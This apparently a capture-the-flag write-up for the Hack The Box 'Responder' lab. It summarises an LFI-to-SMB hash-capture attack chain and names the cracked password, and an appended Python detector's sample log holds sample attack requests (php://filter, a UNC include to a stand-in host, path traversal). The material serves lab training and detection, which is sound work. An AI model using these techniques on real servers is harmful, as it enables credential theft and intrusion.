HTB Starting Point — Responder

Box info
OS: Windows 10 Pro Build 19042 (XAMPP / Apache 2.4.52) | Difficulty: Very Easy | Tier: 1 | Status: Starting Point
Skills: LFI, PHP include, UNC SMB path, Responder, NetNTLMv2, hashcat
Pwned: 2026-04-28

TL;DR
Responder is a Windows box running PHP on XAMPP. The web application at unika.htb passes the page parameter straight into include($_GET['page']) without any input sanitization, a textbook LFI. Reading the source code via php://filter confirms the vulnerability. HTTP RFI is blocked (allow_url_include=0), but SMB RFI works: PHP on Windows handles UNC paths (\\attacker\share\file) natively via include(). Setting up the Responder tool as a rogue SMB server and triggering the UNC include forces the target machine to authenticate with its NTLM credentials. The captured NetNTLMv2 hash for RESPONDER\Administrator cracks in under a second with hashcat against a common wordlist; the password is badminton. WinRM on port 5985 grants a full PowerShell session. The flag is on mike’s desktop. ...

April 28, 2026 · 8 min · crAIzy
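
The requests described in the TL;DR leave a recognisable trace in the web server's access log. As an added example (not part of the original write-up), this scans Apache log lines for page= values that are stream wrappers, UNC paths or traversal sequences. The log lines, client addresses and the about.html page name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines for illustration; not taken from the box.
SAMPLE_LOG = r'''
198.51.100.7 - - [28/Apr/2026:10:00:01 +0000] "GET /index.php?page=about.html HTTP/1.1" 200 4521
192.0.2.10 - - [28/Apr/2026:10:02:13 +0000] "GET /index.php?page=php://filter/resource=index.php HTTP/1.1" 200 912
192.0.2.10 - - [28/Apr/2026:10:03:40 +0000] "GET /index.php?page=//192.0.2.10/share/x HTTP/1.1" 200 310
192.0.2.10 - - [28/Apr/2026:10:03:55 +0000] "GET /index.php?page=%5C%5C192.0.2.10%5Cshare%5Cx HTTP/1.1" 200 310
192.0.2.10 - - [28/Apr/2026:10:05:02 +0000] "GET /index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 92
'''

# Client address and request URI from a common/combined log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# A page selector should be a bare file name; each rule marks a value that is not.
RULES = [
    ("stream-wrapper", re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)),  # php://, http://, ...
    ("unc-path", re.compile(r'^(?:\\\\|//)[^\\/]+[\\/]')),            # \\host\share or //host/share
    ("traversal", re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')),         # ../ or ..\
]

def classify(value):
    """Return the names of the rules a decoded parameter value matches."""
    return [name for name, rx in RULES if rx.search(value)]

def scan(log_text, param="page"):
    """Return (client, value, labels) for requests whose `param` is flagged."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, uri = m.groups()
        # parse_qs percent-decodes, so encoded slashes and backslashes are matched in clear.
        for value in parse_qs(urlsplit(uri).query, keep_blank_values=True).get(param, []):
            labels = classify(value)
            if labels:
                hits.append((client, value, labels))
    return hits

if __name__ == "__main__":
    for client, value, labels in scan(SAMPLE_LOG):
        print(f"{client}  {','.join(labels):15} {value}")
```

A UNC hit on the web server pairs naturally with outbound SMB (TCP 445) from that host in firewall or flow logs, which is the connection that carries the NTLM authentication.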